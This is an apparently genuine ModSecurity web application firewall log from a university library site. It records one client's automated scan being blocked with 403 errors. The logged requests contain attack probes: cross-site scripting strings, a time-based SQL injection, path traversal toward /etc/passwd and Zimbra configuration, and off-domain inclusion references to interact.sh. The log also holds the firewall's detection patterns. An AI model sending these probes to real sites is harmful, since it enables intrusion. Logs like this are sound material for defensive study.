[Tue Aug 29 11:52:13.715778 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnIlo4AAAAV"]
[Tue Aug 29 11:52:14.666849 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAoCWFkAAAAB"]
[Tue Aug 29 11:52:14.670994 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAni@-4AAAAU"]
[Tue Aug 29 11:52:14.703348 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAn95-MAAAAD"]
[Tue Aug 29 11:52:15.579021 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnIlpgAAAAV"]
[Tue Aug 29 11:52:15.580477 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download"] [unique_id "ZO15f8Co-f0AAAnd3FMAAAAI"]
[Tue Aug 29 11:52:16.632328 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gMCo-f0AAAnkwgwAAAAY"]
[Tue Aug 29 11:52:16.721142 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [691] [NEW_INDEX_BANNERS] Trade-in football"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gMCo-f0AAAnTlN8AAAAA"]
[Tue Aug 29 11:52:17.548819 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnTlOAAAAAA"]
[Tue Aug 29 11:52:17.880916 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAjdQcAAAAAZ"]
[Tue Aug 29 11:52:17.882746 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnn2CYAAAAe"]
[Tue Aug 29 11:52:18.532213 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn96AEAAAAD"]
[Tue Aug 29 11:52:19.718857 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnHQjIAAAAT"]
[Tue Aug 29 11:52:21.241132 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn96AwAAAAD"]
[Tue Aug 29 11:52:22.192354 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forum/index.php"] [unique_id "ZO15hsCo-f0AAAnd3GEAAAAI"]
[Tue Aug 29 11:52:23.595400 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAnHQjYAAAAT"]
[Tue Aug 29 11:52:24.836886 2023] [:error] [pid 2572] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAoMLacAAAAH"]
[Tue Aug 29 11:52:24.860955 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15iMCo-f0AAAoN9cAAAAAJ"]
[Tue Aug 29 11:52:25.591428 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAfWONcAAAAL"]
[Tue Aug 29 11:52:26.545695 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAlIBmQAAAAn"]
[Tue Aug 29 11:52:26.595723 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15isCo-f0AAAlIBmUAAAAn"]
[Tue Aug 29 11:52:26.620224 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAnn2DEAAAAe"]
[Tue Aug 29 11:52:26.666880 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAnTlPcAAAAA"]
[Tue Aug 29 11:52:27.839434 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAmNp7IAAAAQ"]
[Tue Aug 29 11:52:27.951958 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15i8Co-f0AAAnjjOsAAAAX"]
[Tue Aug 29 11:52:28.722281 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnTlPsAAAAA"]
[Tue Aug 29 11:52:29.558836 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAoGFXoAAAAE"]
[Tue Aug 29 11:52:30.545060 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAnd3G8AAAAI"]
[Tue Aug 29 11:52:32.617608 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoLfGgAAAAG"]
[Tue Aug 29 11:52:33.567451 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoGFYYAAAAE"]
